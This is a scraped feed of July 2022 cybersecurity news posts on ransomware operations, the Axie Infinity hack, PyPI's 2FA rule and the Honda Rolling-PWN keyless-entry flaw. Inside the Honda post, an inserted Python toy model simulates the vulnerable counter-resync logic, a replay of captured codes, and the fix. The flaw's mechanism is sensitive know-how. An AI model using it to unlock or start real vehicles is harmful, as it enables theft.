The ransomware operation has been active at least since May 2022 and already claimed to have breached multiple organizations.

Victims of the ransomware reported that the malware appends the .0mega extension to the names of encrypted files and creates a customized ransom note for each victim named DECRYPT-FILES.txt.

In some cases the operators behind this ransomware included in the ransom note details on how they would disclose the attack to business partners and trade associations should the victim refuse to pay the ransom.

Source https://id-ransomware.blogspot.com/2022/05/0mega-ransomware.html

Like other ransomware gangs, the operators use a payment negotiation site hosted on the Tor network.

Victims can contact the operators via the negotiation site by uploading the ransom note dropped on their systems; the note includes a unique identifier for the victim.

The researcher Andrew Ivanov, who worked with Lawrence Abrams, published a blog post that includes details about the ransomware.

A new article in my Digest #0mega #Ransomware https://t.co/UoAs0M9mba
Extension: .0mega
R/n: DECRYPT-FILES.txt
Sample ransom note and exe-file not yet found. pic.twitter.com/xQs34oKPAy

— Amigo-A (@Amigo_A_) July 9, 2022

BleepingComputer confirmed that at the time of their report, the researchers have yet to find a 0mega sample.


Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

The post Experts warn of the new 0mega ransomware operation appeared first on Security Affairs.

Categories: Cyber Security News

Hackers Used Fake Job Offer to Hack and Steal $540 Million from Axie Infinity

The Hacker News - Mon, 07/11/2022 - 02:43
The $540 million hack of Axie Infinity's Ronin Bridge in late March 2022 was the consequence of one of its former employees getting tricked by a fraudulent job offer on LinkedIn, it has emerged.  According to a report from The Block published last week citing two people familiar with the matter, a senior engineer at the company was duped into applying for a job at a non-existent company, causing
Categories: Cyber Security News

PyPI Repository Makes 2FA Security Mandatory for Critical Python Projects

The Hacker News - Mon, 07/11/2022 - 01:23
The maintainers of the official third-party software repository for Python have begun imposing a new two-factor authentication (2FA) condition for projects deemed "critical." "We've begun rolling out a 2FA requirement: soon, maintainers of critical projects must have 2FA enabled to publish, update, or modify them," Python Package Index (PyPI) said in a tweet last week. "Any maintainer of a
Categories: Cyber Security News

Experts demonstrate how to unlock several Honda models via Rolling-PWN attack

Security Affairs - Sun, 07/10/2022 - 13:40
Bad news for the owners of several Honda models: the Rolling-PWN Attack vulnerability can allow attackers to unlock their vehicles.

Security researchers Kevin2600 and Wesley Li from Star-V Lab independently discovered a flaw in Honda models, named the Rolling-PWN Attack vulnerability (CVE-2021-46145), that can allow attackers to unlock the vehicles.

A remote keyless entry (RKE) system allows a vehicle to be unlocked or started remotely. The researchers tested Honda’s RKE system and discovered the Rolling-PWN attack issue. According to the experts, the issue affects all Honda vehicles on the market (from model year 2012 up to model year 2022).

Ladies and gentlemen, it is my honor to presenting you the Rolling-Pwn attack research on Honda Keyfob system. (https://t.co/UqJEJofxtr) pic.twitter.com/3ZccqfJrUa

— Kevin2600 (@Kevin2600) July 7, 2022

Successful exploitation of this flaw can allow attackers to permanently open the car door or even start the engine of a vehicle.

The issue resides in a version of the rolling codes mechanism implemented in many Honda models to prevent replay attacks.

“We found it in a vulnerable version of the rolling codes mechanism, which is implemented in huge amounts of Honda vehicles. A rolling code system in keyless entry systems is to prevent replay attack. After each keyfob button pressed the rolling codes synchronizing counter is increased. However, the vehicle receiver will accept a sliding window of codes, to avoid accidental key pressed by design.” reads the description of the Rolling Pwn Attack published on GitHub. “By sending the commands in a consecutive sequence to the Honda vehicles, it will be resynchronizing the counter. Once counter resynced, commands from the previous cycle of the counter worked again. Therefore, those commands can be used later to unlock the car at will.”
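The sliding-window and counter-resync behaviour described above, as an added toy model that is not the researchers’ code: a receiver that accepts codes inside a window ahead of its counter and treats a consecutive pair of out-of-window codes as a resync request, with a flag that reproduces the backward resync the write-up describes next to the corrected rule that a resync may only ever move the counter forward. The key, the HMAC-based code construction, the counter size and the window are constructed values for the model.

```python
# Added illustration (not Star-V Lab's code): toy rolling-code receiver with a
# sliding acceptance window and a two-consecutive-code resync rule.
# Key, code construction, counter size and window are constructed for the model.
import hashlib
import hmac

KEY = b"constructed-demo-key"      # shared fob/vehicle secret (constructed)
COUNTER_BITS = 12                  # small counter space keeps the model fast
SPACE = 1 << COUNTER_BITS

def make_code(counter: int) -> bytes:
    """Fob side: the code transmitted for a counter value (assumed construction)."""
    return hmac.new(KEY, counter.to_bytes(2, "big"), hashlib.sha256).digest()[:6]

# Lookup table stands in for the receiver's code search, purely for the model.
CODE_TO_COUNTER = {make_code(c): c for c in range(SPACE)}

class Receiver:
    """Vehicle side. backward_resync=True reproduces the weakness the write-up
    describes: a consecutive pair of valid codes resyncs the counter even to a
    value below the last accepted one, so codes of an earlier cycle work again."""

    def __init__(self, window: int = 16, backward_resync: bool = False):
        self.last = 0                 # highest counter accepted so far
        self.window = window
        self.backward_resync = backward_resync
        self.pending = None           # counter of the last out-of-window code seen

    def accept(self, code: bytes) -> bool:
        counter = CODE_TO_COUNTER.get(code)
        if counter is None:           # not a valid code for this fob at all
            self.pending = None
            return False
        if self.last < counter <= self.last + self.window:
            self.last, self.pending = counter, None     # normal button press
            return True
        # Outside the window: two consecutive codes request a resync.
        if self.pending is not None and counter == self.pending + 1:
            if counter > self.last or self.backward_resync:
                self.last, self.pending = counter, None
                return True
        self.pending = counter        # remember it as the first of a pair
        return False

def stale_codes_accepted(backward_resync: bool) -> bool:
    """Replay scenario: codes 1..5 are observed over the air, the owner then
    uses the fob up to counter 60, and the observed codes are sent consecutively."""
    rx = Receiver(backward_resync=backward_resync)
    observed = [make_code(c) for c in range(1, 6)]
    for c in range(1, 61):            # owner's legitimate presses, in order
        assert rx.accept(make_code(c))
    return any(rx.accept(code) for code in observed)

def forward_resync_works(backward_resync: bool) -> bool:
    """A fob pressed many times out of range still resyncs when the pair is ahead."""
    rx = Receiver(backward_resync=backward_resync)
    rx.accept(make_code(1))
    return [rx.accept(make_code(c)) for c in (200, 201, 202)] == [False, True, True]
```

The forward-only rule keeps the legitimate far-ahead resync working while rejecting every code from a counter cycle the receiver has already passed.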

The experts successfully tested the attack against the 10 most popular Honda models from model year 2012 up to model year 2022, including:

  · Honda Civic 2012
  · Honda X-RV 2018
  · Honda C-RV 2020
  · Honda Accord 2020
  · Honda Odyssey 2020
  · Honda Inspire 2021
  · Honda Fit 2022
  · Honda Civic 2022
  · Honda VE-1 2022
  · Honda Breeze 2022

The researchers also published a set of PoC videos, below is an attack against a Honda CRV:

The researchers pointed out that there is no way to tell whether the flaw has been exploited against a vehicle, because exploitation leaves no traces in traditional log files.

How to fix the issue?

“The common solution requires us to bring the vehicle back to a local dealership as a recall. But the recommended mitigation strategy is to upgrade the vulnerable BCM firmware through Over-the-Air (OTA) Updates if feasible. However, some old vehicles may not support OTA.” the experts recommended.


Pierluigi Paganini

(SecurityAffairs – hacking, Rolling-PWN Attack)

The post Experts demonstrate how to unlock several Honda models via Rolling-PWN attack appeared first on Security Affairs.

Categories: Cyber Security News

French telephone operator La Poste Mobile suffered a ransomware attack

Security Affairs - Sun, 07/10/2022 - 12:07
French virtual mobile telephone operator La Poste Mobile was hit by a ransomware attack that impacted administrative and management services. 

The ransomware attack hit the virtual mobile telephone operator La Poste Mobile on July 4 and paralyzed administrative and management services. 

The company pointed out that threat actors may have accessed its customers’ data and is therefore recommending that they remain vigilant. It highlighted the risk of identity theft or phishing attacks in case their data has been compromised.

“The administrative and management services of La Poste Mobile fell victim, on Monday July 4, to a malicious ransomware-type virus. As soon as we became aware of this incident, we took the necessary protective measures by immediately suspending the computer systems concerned. This protective action has led us to temporarily close our website and our customer area,” reads a statement published by the company on its website that is still down. “Our IT teams are currently diagnosing the situation. Our first analyses establish that our servers essential to the operation of your mobile line have been well protected. On the other hand, it is possible that files present in the computers of La Poste Mobile employees have been affected. Some of them may contain personal data.”

For any additional information concerning personal data, customers can contact La Poste Telecom customer service at the following address: [email protected]

Who is behind the attack?

The LockBit ransomware operation added the name of La Poste Mobile to its leak site overnight from Thursday to Friday.

The claim appeared in the middle of the night on the #LockBit 3.0 showcase: an affiliate of the franchise attacked #LaPosteMobile. There is no doubt about the material reality of the attack, even though it had almost gone unnoticed… #ransomware https://t.co/Ef7u7jOah0

— Valéry Rieß-Marchive (@ValeryMarchive) July 8, 2022

The gang has been active since at least 2019 and today it is one of the most active ransomware operations. Recently, the LockBit ransomware operation released LockBit 3.0, which brings important novelties such as a bug bounty program, Zcash payments, and new extortion tactics.

Recent incidents attributed to the group include attacks on a Foxconn factory, a Canadian fighter jet training company, and a popular German library service.


Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

The post French telephone operator La Poste Mobile suffered a ransomware attack appeared first on Security Affairs.

Categories: Cyber Security News

Security Affairs newsletter Round 373 by Pierluigi Paganini

Security Affairs - Sun, 07/10/2022 - 10:41
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs for free in your email box.

Apple Lockdown Mode will protect users against highly targeted cyberattacks
Fortinet addressed multiple vulnerabilities in several products
Rozena backdoor delivered by exploiting the Follina bug
Ongoing Raspberry Robin campaign leverages compromised QNAP devices
Evolution of the LockBit Ransomware operation relies on new techniques
Cisco fixed a critical arbitrary File Overwrite flaw in Enterprise Communication solutions
Emsisoft: Victims of AstraLocker and Yashma ransomware can recover their files for free
Discussing the risks of bullying for anonymous social app NGL
Russian Cybercrime Trickbot Group is systematically attacking Ukraine
New Checkmate ransomware target QNAP NAS devices
Large-scale cryptomining campaign is targeting the NPM JavaScript package repository
North Korea-linked APTs use Maui Ransomware to target the Healthcare industry
ENISA released the Threat Landscape Methodology
OrBit, a new sophisticated Linux malware still undetected
OpenSSL version 3.0.5 fixes a flaw that could potentially lead to RCE
Marriott International suffered a new data breach, attackers stole 20GB of data
Cyberattacks against law enforcement are on the rise
Less popular, but very effective, Red-Teaming Tool BRc4 used in attacks in the wild
New Hive ransomware variant is written in Rust and use improved encryption method
Iranian Fars News Agency claims cyberattack on a company involved in the construction of Tel Aviv metro
Cyber Police of Ukraine arrested 9 men behind phishing attacks on Ukrainians attempting to capitalize on the ongoing conflict
Threat actors compromised British Army’s Twitter, YouTube accounts to promote crypto scams
AstraLocker ransomware operators shut down their operations
Google fixes the fourth Chrome zero-day in 2022
Data of a billion Chinese residents available for sale on a cybercrime forum
Popular Django web framework affected by a SQL Injection flaw. Upgrade it now!
Unfaithful HackerOne employee steals bug reports to claim additional bounties
Threat Report Portugal: Q2 2022
CISA orders federal agencies to patch CVE-2022-26925 by July 22
Tens of Jenkins plugins are affected by zero-day vulnerabilities
Microsoft: Raspberry Robin worm already infected hundreds of networks


Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 373 by Pierluigi Paganini appeared first on Security Affairs.

Categories: Cyber Security News
